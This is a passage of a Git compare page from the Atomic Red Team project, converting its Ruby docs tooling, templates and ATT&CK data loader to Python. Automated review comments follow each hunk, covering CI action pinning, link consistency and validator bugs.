Compare commits

..

2 Commits

Author SHA1 Message Date
Hare Sudhan d548576cce python conversion 2025-11-26 00:05:35 -05:00
Hare Sudhan 1be2e57e52 python conversion 2025-11-25 23:32:49 -05:00
425 changed files with 41603 additions and 28910 deletions
+2 -2
@@ -11,7 +11,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: download-artifact
uses: actions/github-script@v9
uses: actions/github-script@v8
with:
script: |
let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
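Review bot: the two `uses:` lines in the download-artifact step swap `actions/github-script@v9` for `actions/github-script@v8`; in unified-diff order the removed line comes first, which reads as a downgrade, but the +/- markers did not survive extraction, so confirm the intended direction and, if it really is a downgrade, say why in the commit message. Because this step's script calls `github.rest.actions.listWorkflowRunArtifacts` with a token that can read other runs' artifacts, pin the action to a full commit SHA (with the tag in a trailing comment) rather than a floating major tag, so a retagged or compromised release cannot change what executes here.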
@@ -35,7 +35,7 @@ jobs:
run: unzip labels.zip
- name: assign-labels-and-reviewers
uses: actions/github-script@v9
uses: actions/github-script@v8
with:
script: |
let fs = require('fs');
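Review bot: the same `@v9`/`@v8` swap, now on the `assign-labels-and-reviewers` step. The data flow in this hunk is the part that deserves attention: `run: unzip labels.zip` unpacks an artifact that the previous hunk fetched with `listWorkflowRunArtifacts` from another workflow run (apparently the one that handles the pull request and uploads `labels.json` in the @@ -69 hunk of the other workflow), and the script then reads it with `fs` and applies labels and reviewers. Treat that file as untrusted input controlled by the PR author: parse it strictly as JSON, accept label names only from a fixed allow-list, and ignore anything else, so a crafted artifact cannot steer reviewer assignment or abuse this workflow's write permissions.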
+2 -2
@@ -42,7 +42,7 @@ jobs:
with:
python-version: "3.11.2"
cache: "poetry"
- uses: actions/github-script@v9
- uses: actions/github-script@v8
id: get_pr_number
with:
script: |
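Review bot: same `actions/github-script` swap between `@v9` and `@v8` as in the labels workflow, and the same direction and SHA-pinning question applies. On the surrounding context, `python-version: "3.11.2"` pins an exact patch release from early 2023; later 3.11.x releases carry only bug and security fixes, so unless byte-for-byte reproducibility is a requirement, `"3.11"` (resolving to the newest patch) is the safer pin for a job that now runs the converted Python code with `cache: "poetry"`.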
@@ -69,7 +69,7 @@ jobs:
env:
PYTHONPATH: ${{ github.workspace }}
- uses: actions/upload-artifact@v7
- uses: actions/upload-artifact@v5
with:
name: labels.json
path: atomic_red_team/pr/
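Review bot: `actions/upload-artifact` moves between `@v7` and `@v5` here; as with the github-script lines, confirm which direction is intended, because artifact majors have changed upload semantics before (v4 made uploaded artifacts immutable), and the consumer in the labels workflow (`unzip labels.zip` after `listWorkflowRunArtifacts`) depends on the produced zip layout. Also, the artifact is named `labels.json` but `path:` is the directory `atomic_red_team/pr/`, so everything written there gets uploaded; restrict the path to the one file unless the consumer needs more.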
+1 -1
@@ -12,7 +12,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v6
- uses: hashicorp/setup-terraform@v4
- uses: hashicorp/setup-terraform@v3
- name: Terraform fmt
id: fmt
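Review bot: `hashicorp/setup-terraform` swaps between `@v4` and `@v3` while `actions/checkout@v6` stays as unchanged context; the same direction check applies as for the other action version changes in this compare. For a job that only runs `terraform fmt`, pin both actions to commit SHAs and give the job `permissions: contents: read`, so a formatting check never holds a write-capable token.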
+2 -2
@@ -29,7 +29,7 @@ If you see anything that you believe breaks our community guidelines, no matter
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://atomicredteam.io/slack)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://slack.atomicredteam.io/)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
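Review bot: the Slack link in the reporting paragraph changes between `https://atomicredteam.io/slack` and `https://slack.atomicredteam.io/` (the @@ -45 hunk below makes the same change in the links list). Whichever is the new canonical invite, confirm the other form still redirects to it and that the `slack.` subdomain is under the project's control: this is the contact path for conduct reports, and a dangling hostname here would be an easy target for squatting.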
@@ -45,7 +45,7 @@ This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family
* [Atomic Red Team Website](https://atomicredteam.io/)
* [Atomic Red Team Slack](https://atomicredteam.io/slack)
* [Atomic Red Team Slack](https://slack.atomicredteam.io/)
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
-2
@@ -1,2 +0,0 @@
source "https://rubygems.org"
gemspec
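Review bot: with the Gemfile gone, Gemfile.lock and any `bundle install` steps in CI should be removed in the same change so a stale Ruby lock file does not linger. The workflow hunk at @@ -42 now relies on `cache: "poetry"`, which means a committed poetry.lock is the file that pins the new Python dependency set; make sure it is part of this compare.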
+2 -2
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1790-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1750-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
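Review bot: the Atomics badge count is hand-edited between 1790 and 1750 in this hunk; read in unified-diff order that is a drop of 40 tests in a change that is otherwise a language conversion. If the badge is normally rewritten by the docs generator, let the generator produce it instead of editing it by hand in this commit, and if the count really changed, the commit message should say why.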
@@ -32,7 +32,7 @@ To stay up to date on all things Atomic Red Team, sign up for the Atomic Newslet
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
- Join our [Slack workspace](https://atomicredteam.io/slack) and get involved
- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
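Review bot: this link uses `https://slack.atomicredteam.io` with no trailing slash while the CODE_OF_CONDUCT hunks use `https://slack.atomicredteam.io/`; pick one form for every occurrence so link checkers and redirect rules treat them identically.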
-15
@@ -1,15 +0,0 @@
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = 'atomic-red-team'
s.version = '1.0'
s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
s.email = ['it@redcanary.com', 'opensource@redcanary.com']
s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
s.license = "MIT"
s.homepage = "https://redcanary.com/atomic-red-team"
s.files = %w(atomic-red-team.gemspec) + Dir['{atomic_red_team}/**/*', '*.md', 'bin/*']
s.test_files = Dir['spec/**/*']
s.require_paths = %w(atomic_red_team)
s.add_development_dependency 'github-pages'
end
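Review bot: the deleted gemspec carried the project metadata (authors, `license = "MIT"`, homepage, summary) and declared `github-pages` as the development dependency used to publish the generated docs. Check that the new Python packaging metadata (pyproject, not visible on this page) restates the license and authors, and that the docs publishing path no longer depends on the Jekyll/github-pages gem.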
@@ -1,91 +0,0 @@
# <%= technique['identifier'] %> - <%= technique['name'] %>
## Description from ATT&CK
<% attack_description_lines = technique['description'].gsub("%\\<", "%<").gsub(/<code>.*?<\/code>/) { |match| match.gsub('~', '\~') } %>
<% attack_description_lines.lines.each do |desc_line| %>> <%= desc_line.strip %>
<% end %>
[Source](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
<% title = "Atomic Test ##{test_number+1}: #{test['name']}" %>- [<%= title %>](#<%= title.downcase.gsub(/ /, '-').gsub(/[`~!@#$%^&*()+=<>?,.\/:;"'|{}\[\]\\–—]/, '') %>)
<% end %>
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
### Atomic Test #<%= test_number+1 %>: <%= test['name'] %>
<%= test['description'].strip %>
**Supported Platforms:** <%= test['supported_platforms'].collect do |p|
case p
when 'macos'
'macOS'
else
p.capitalize
end
end.join(', ') %>
**auto_generated_guid:** `<%= test['auto_generated_guid'] %>`
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"&#92;")
end -%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Attack Commands: Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
<%= test['executor']['steps'] %>
<%- else -%>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`!<%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin)<%- end -%>
<%def get_language(executor)
language = executor
if executor == "command_prompt"
language = "cmd"
elsif executor == "manual"
language = ""
end
language
end%>
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['cleanup_command'].to_s.strip %>
```
<% end -%>
<% if test['dependencies'].to_a.count > 0 -%>
<% dependency_executor = test['executor']['name'] -%>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip %>
###### Check Prereq Commands
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip %>
```
###### Get Prereq Commands
```<%= get_language(dependency_executor) %>
<%= dep['get_prereq_command'].strip %>
```
<% end %>
<% end -%>
<%- end -%>
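Review bot: the removed template generated `### Atomic Test #N: name` headings and built its table-of-contents anchors by lower-casing the title, turning spaces into `-` and stripping a fixed punctuation set, giving anchors of the form `#atomic-test-1-name`. The replacement template in the next hunk changes the heading to `## Atomic Test #N - name` and delegates the anchor to a `slugify` filter, whose treatment of the ` - ` separator may produce a different slug. Any existing deep links into the generated technique pages (from the index pages, the wiki or external tooling) would then break; either keep the old heading text or regenerate every index in the same change and note the anchor change in the commit message.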
+85
@@ -0,0 +1,85 @@
# {{ technique['identifier'] }} - {{ technique['name'] }}
## [Description from ATT&CK](https://attack.mitre.org/techniques/{{ technique['identifier'].replace('.', '/') }})
<blockquote>
{{ technique['description'].replace("%\\<", "%<") }}
</blockquote>
## Atomic Tests
{% for test in atomic_yaml['atomic_tests'] -%}
{% set title = "Atomic Test #" ~ (loop.index) ~ " - " ~ test['name'] -%}
- [{{ title }}](#{{ title | slugify }})
{% endfor %}
{% for test in atomic_yaml['atomic_tests'] -%}
<br/>
## Atomic Test #{{ loop.index }} - {{ test['name'] }}
{{ test['description'].strip() }}
**Supported Platforms:** {{ test['supported_platforms'] | map('platform_display') | join(', ') }}
**auto_generated_guid:** {{ test['auto_generated_guid'] }}
{% if test.get('input_arguments') and test['input_arguments'] | length > 0 %}
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
{% for arg_name, arg_options in test['input_arguments'].items() -%}
| {{ arg_name | cleanup }} | {{ arg_options['description'] | cleanup }} | {{ arg_options['type'] | cleanup }} | {{ arg_options.get('default', '') | cleanup }}|
{% endfor %}
{% endif %}
{%- if test['executor']['name'] == 'manual' %}
#### Run it with these steps! {% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin) {% endif %}
{{ test['executor']['steps'] }}
{% else %}
#### Attack Commands: Run with `{{ test['executor']['name'] }}`! {% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin) {% endif %}
```{{ test['executor']['name'] | get_language }}
{{ test['executor']['command'].strip() }}
```
{% if test['executor'].get('cleanup_command') %}
#### Cleanup Commands:
```{{ test['executor']['name'] | get_language }}
{{ test['executor']['cleanup_command'].strip() }}
```
{% endif %}
{% endif %}
{% if test.get('dependencies') and test['dependencies'] | length > 0 -%}
#### Dependencies: Run with `{{ test.get('dependency_executor_name') or test['executor']['name'] }}`!
{% for dep in test['dependencies'] -%}
##### Description: {{ dep['description'].strip() }}
##### Check Prereq Commands:
```{{ (test.get('dependency_executor_name') or test['executor']['name']) | get_language }}
{{ dep['prereq_command'].strip() }}
```
##### Get Prereq Commands:
```{{ (test.get('dependency_executor_name') or test['executor']['name']) | get_language }}
{{ dep['get_prereq_command'].strip() }}
```
{% endfor %}
{% endif %}
<br/>
{% endfor -%}
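Review bot: three points on the new template. First, the ATT&CK description is emitted inside a raw `<blockquote>` element; Markdown inside an HTML block is not processed until the first blank line, so multi-paragraph descriptions render partly as literal text and partly outside the quote, whereas the ERB version emitted `> ` quoted Markdown lines. Second, `slugify`, `platform_display`, `cleanup` and `get_language` are custom filters that must be registered on the Jinja `Environment`; none is a built-in, and rendering fails if any is missing. Third, check the Environment's `autoescape` setting: with autoescaping on, the `command`, `cleanup_command` and `prereq_command` bodies inside the code fences would be entity-escaped (`&lt;`, `&amp;`, `&#39;`), corrupting what users copy; with it off, the `cleanup` filter is the only protection for the table cells and should neutralise `|` as well as backslashes.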
@@ -1 +0,0 @@
TBD
-271
@@ -1,271 +0,0 @@
require 'yaml'
require 'erb'
require 'attack_api'
require 'securerandom'
class AtomicRedTeam
ATTACK_API = Attack.new
ATOMICS_DIRECTORY = "#{File.dirname(File.dirname(__FILE__))}/atomics"
# TODO- should these all be relative URLs?
ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team"
#
# Returns a list of paths that contain Atomic Tests
#
def atomic_test_paths
Dir["#{ATOMICS_DIRECTORY}/T*/T*.yaml"].sort
end
#
# Returns a list of Atomic Tests in Atomic Red Team (as Hashes from source YAML)
#
def atomic_tests
@atomic_tests ||= atomic_test_paths.collect do |path|
atomic_yaml = YAML.load(File.read path)
atomic_yaml['atomic_yaml_path'] = path
atomic_yaml
end
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
def atomic_tests_for_technique_by_platform(technique_or_technique_identifier, platform)
technique_identifier = if technique_or_technique_identifier.is_a? Hash
ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
else
technique_or_technique_identifier
end
test_list = Array.new
atomic_tests.find do |atomic_yaml|
if atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
atomic_yaml['atomic_tests'].each do |a_test|
if a_test["supported_platforms"].include?(platform[:platform])
test_list.append(a_test)
end
end
end
end
test_list
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
def atomic_tests_for_technique(technique_or_technique_identifier)
technique_identifier = if technique_or_technique_identifier.is_a? Hash
ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
else
technique_or_technique_identifier
end
atomic_tests.find do |atomic_yaml|
atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
end.to_h.fetch('atomic_tests', [])
end
#
# Returns a Markdown formatted Github link to a technique. This will be to the edit page for
# techniques that already have one or more Atomic Red Team tests, or the create page for
# techniques that have no existing tests for the given OS.
#
def github_link_to_technique(technique, include_identifier: false, only_platform: self.only_platform)
technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exist? markdown_file)
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
end
end
def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
has_test_for_platform = false
if File.exist? yaml_file
yaml = YAML.load_file(yaml_file)
yaml['atomic_tests'].each_with_index do |atomic, i|
if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
has_test_for_platform = true
break
end
end
end
return has_test_for_platform
end
def validate_atomic_yaml!(yaml, used_guids_file, unique_guid_array)
raise("YAML file has no elements") if yaml.nil?
raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique')
raise('`attack_technique` element must be a string') unless yaml['attack_technique'].is_a?(String)
raise('`display_name` element is required') unless yaml.has_key?('display_name')
raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String)
raise('`atomic_tests` element is required') unless yaml.has_key?('atomic_tests')
raise('`atomic_tests` element must be an array') unless yaml['atomic_tests'].is_a?(Array)
raise('`atomic_tests` element is empty - you have no tests') unless yaml['atomic_tests'].count > 0
yaml['atomic_tests'].each_with_index do |atomic, i|
raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name')
raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String)
if atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
raise("`atomic_tests[#{i}].auto_generated_guid` element not a proper guid") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/.match(guid)
raise("`atomic_tests[#{i}].auto_generated_guid` element must be unique") unless !unique_guid_array.include?(guid)
unique_guid_array << guid
end
raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description')
raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String)
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
end
end
if atomic['dependencies']
atomic['dependencies'].each do |dependency|
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a description}") unless dependency.has_key?('description')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a prereq_command}") unless dependency.has_key?('prereq_command')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a get_prereq_command}") unless dependency.has_key?('get_prereq_command')
end
end
(atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai|
arg_name, arg = arg_kvp
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description')
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element must be a string") unless arg['description'].is_a?(String)
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element is required") unless arg.has_key?('type')
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be a string") unless arg['type'].is_a?(String)
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be lowercased and underscored (was #{arg['type']})") unless arg['type'] =~ /[a-z_]+/
# TODO: determine if we think default values are required for EVERY input argument
# raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element is required") unless arg.has_key?('default')
# raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element must be a string (was a #{arg['default'].class.name})") unless arg['default'].is_a?(String)
end
raise("`atomic_tests[#{i}].executor` element is required") unless atomic.has_key?('executor')
executor = atomic['executor']
raise("`atomic_tests[#{i}].executor.name` element is required") unless executor.has_key?('name')
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
raise("`atomic_tests[#{i}].executor.steps` element must be a string") unless executor['steps'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['command'],
string_description: "atomic_tests[#{i}].executor.command"
else
raise("`atomic_tests[#{i}].executor.name` '#{executor['name']}' must be one of #{valid_executor_types.join(', ')}")
end
validate_no_todos!(atomic, path: "atomic_tests[#{i}]")
end
end
def record_used_guids!(yaml, used_guids_file)
return unless !yaml.nil?
yaml['atomic_tests'].each_with_index do |atomic, i|
next unless atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
add_guid_to_used_guid_file(guid, used_guids_file) unless guid == ''
end
end
def generate_guids_for_yaml!(path, used_guids_file)
text = File.read(path)
# add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
text.gsub!(/(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))/) { |m| "#{$1}\n#{$2.gsub(/-/," ")}auto_generated_guid:"}
# fill the "auto_generated_guid:" element in if it doesn't contain a guid
text.gsub!(/(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$/) { |m| "#{$1} #{get_unique_guid!(used_guids_file)}"}
File.open(path, "w") { |file| file << text }
end
# generates a unique guid and records the guid as having been used by writing it to the used_guids_file
def get_unique_guid!(used_guids_file)
new_guid = ''
20.times do |i| # if it takes more than 20 tries to get a unique guid, there must be something else going on
new_guid = SecureRandom.uuid
break unless !is_unique_guid(new_guid, used_guids_file)
end
# add this new unique guid to the used guids file
add_guid_to_used_guid_file(new_guid, used_guids_file)
return new_guid
end
# add guid to used guid file if it is the proper format and is not already in the file. raises an exception if guid isn't valid
def add_guid_to_used_guid_file(guid, used_guids_file)
open(used_guids_file, 'a') { |f|
raise("the GUID (#{guid}) does not match the required format for the `auto_generated_guid` element") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/ =~ guid
f.puts guid unless !is_unique_guid(guid, used_guids_file)
}
end
def is_unique_guid(guid, used_guids_file)
return !File.foreach(used_guids_file).grep(/#{guid}/).any?
end
#
# Validates that the arguments (specified in "#{arg}" format) in a string
# match the input_arguments for a test
#
def validate_input_args_vs_string!(input_args:, string:, string_description:)
input_args_in_string = string.scan(/#\{([^}]+)\}/).to_a.flatten
input_args_in_string_and_not_specced = input_args_in_string - input_args
if input_args_in_string_and_not_specced.count > 0
raise("`#{string_description}` contains args #{input_args_in_string_and_not_specced} not in input_arguments")
end
input_args_in_spec_not_string = input_args - input_args_in_string
if input_args_in_string_and_not_specced.count > 0
raise("`atomic_tests[#{i}].input_arguments` contains args #{input_args_in_spec_not_string} not in command")
end
end
#
# Recursively validates that the hash (or something) doesn't contain a TODO
#
def validate_no_todos!(hashish, path:)
if hashish.is_a? String
raise "`#{path}` contains a TODO" if hashish.include? 'TODO'
elsif hashish.is_a? Array
hashish.each_with_index do |item, i|
validate_no_todos! item, path: "#{path}[#{i}]"
end
elsif hashish.is_a? Hash
hashish.each do |k, v|
validate_no_todos! v, path: "#{path}.#{k}"
end
end
end
end
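Review bot: the deleted validator has defects that the Python port should not inherit, so check the port against them rather than translating line by line. In `validate_input_args_vs_string!` the second check tests `input_args_in_string_and_not_specced.count` instead of `input_args_in_spec_not_string.count`, and its message interpolates `i`, which is not defined in that method, so declared-but-unused input arguments were never reported. The GUID regex used in `validate_atomic_yaml!` and `add_guid_to_used_guid_file` is unanchored, so any string containing a UUID-shaped substring passes. The `display_name` message says "must be an array" while the check is `is_a?(String)`. And the atomic files are read with `YAML.load`, which on older Ruby can instantiate arbitrary objects; since these files arrive in pull requests, the port should read them with `yaml.safe_load`.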
+238
@@ -0,0 +1,238 @@
"""
Attack API module for loading and querying MITRE ATT&CK technique data.
This module provides the Attack class that loads information about ATT&CK techniques
from MITRE's ATT&CK STIX representation using the mitreattack-python library.
"""
import json
import re
from pathlib import Path
from typing import Dict, List, Optional, Pattern
# Tactics in the order that the ATT&CK matrix uses
ORDERED_TACTICS = [
"initial-access",
"execution",
"persistence",
"privilege-escalation",
"defense-evasion",
"credential-access",
"discovery",
"lateral-movement",
"collection",
"exfiltration",
"command-and-control",
"impact",
]
class Attack:
"""
API class that loads information about ATT&CK techniques from MITRE's ATT&CK
STIX representation. Optimized for speed with caching.
"""
def __init__(self, stix_file: Optional[str] = None):
"""
Initialize the Attack API.
Args:
stix_file: Optional path to a local STIX JSON file.
Defaults to enterprise-attack.json in the same directory.
"""
if stix_file is None:
stix_file = str(Path(__file__).parent / "enterprise-attack.json")
self._stix_file = stix_file
self._techniques: Optional[List[dict]] = None
self._technique_by_id: Optional[Dict[str, dict]] = None
self._attack_stix: Optional[dict] = None
def _load_stix(self) -> dict:
"""Load and cache the STIX JSON data."""
if self._attack_stix is None:
with open(self._stix_file, "r", encoding="utf-8") as f:
self._attack_stix = json.load(f)
return self._attack_stix
@property
def ordered_tactics(self) -> List[str]:
"""Returns tactics in the order that the ATT&CK matrix uses."""
return ORDERED_TACTICS
def technique_identifier_for_technique(self, technique: dict) -> str:
"""
Returns the technique identifier (e.g., T1234) for a Technique object.
Args:
technique: A technique dictionary from the STIX data.
Returns:
The technique ID (e.g., "T1234" or "T1234.001").
"""
external_refs = technique.get("external_references", [])
for ref in external_refs:
if ref.get("source_name") == "mitre-attack":
return ref.get("external_id", "").upper()
return ""
def _build_technique_index(self) -> Dict[str, dict]:
"""Build an index of technique_id -> technique for fast lookups."""
if self._technique_by_id is None:
self._technique_by_id = {}
for technique in self.techniques:
tech_id = self.technique_identifier_for_technique(technique)
if tech_id:
self._technique_by_id[tech_id] = technique
return self._technique_by_id
def technique_info(self, technique_id: str) -> Optional[dict]:
"""
Returns a Technique object given a technique identifier (T1234).
Args:
technique_id: The technique ID (e.g., "T1234").
Returns:
The technique dictionary or None if not found.
"""
index = self._build_technique_index()
return index.get(technique_id.upper())
def ordered_tactic_to_technique_matrix(
self, only_platform: Pattern = re.compile(r".*")
) -> List[List[Optional[dict]]]:
"""
Returns the ATT&CK Matrix as a 2D array, in order by ordered_tactics.
Args:
only_platform: Regex pattern to filter techniques by platform.
Returns:
2D list of techniques organized by tactic columns.
"""
all_techniques = self.techniques_by_tactic(only_platform=only_platform)
# Make a 2D array of techniques in the order our tactics appear
all_techniques_in_tactic_order = []
for tactic in self.ordered_tactics:
all_techniques_in_tactic_order.append(all_techniques.get(tactic, []))
# Figure out the max number of techniques any one tactic has
max_techniques = (
max(len(techs) for techs in all_techniques_in_tactic_order)
if all_techniques_in_tactic_order
else 0
)
if max_techniques == 0:
return []
# Extend each array of techniques to that length
for techniques in all_techniques_in_tactic_order:
techniques.extend([None] * (max_techniques - len(techniques)))
# Transpose to give us the data in columnar format
return list(map(list, zip(*all_techniques_in_tactic_order)))
def techniques_by_tactic(
self, only_platform: Pattern = re.compile(r".*")
) -> Dict[str, List[dict]]:
"""
Returns a map of all [ATT&CK Tactic name] => [List of ATT&CK techniques].
Args:
only_platform: Regex pattern to filter techniques by platform.
Returns:
Dictionary mapping tactic names to lists of techniques.
"""
techniques_by_tactic: Dict[str, List[dict]] = {}
for technique in self.techniques:
platforms = technique.get("x_mitre_platforms")
if platforms is None:
continue
# Check if any platform matches
platform_match = any(
only_platform.match(p.lower().replace(" ", "-")) for p in platforms
)
if not platform_match:
continue
# Skip revoked or deprecated techniques
if technique.get("revoked", False):
continue
if technique.get("x_mitre_deprecated", False):
continue
# Add to each tactic this technique belongs to
kill_chain_phases = technique.get("kill_chain_phases", [])
for phase in kill_chain_phases:
if phase.get("kill_chain_name") == "mitre-attack":
tactic_name = phase.get("phase_name")
if tactic_name:
if tactic_name not in techniques_by_tactic:
techniques_by_tactic[tactic_name] = []
techniques_by_tactic[tactic_name].append(technique)
return techniques_by_tactic
@property
def techniques(self) -> List[dict]:
"""
Returns a list of all ATT&CK techniques.
Returns:
List of technique dictionaries.
"""
if self._techniques is not None:
return self._techniques
stix_data = self._load_stix()
self._techniques = []
for item in stix_data.get("objects", []):
if item.get("type") != "attack-pattern":
continue
# Check if it has mitre-attack external reference
external_refs = item.get("external_references", [])
has_mitre_ref = any(
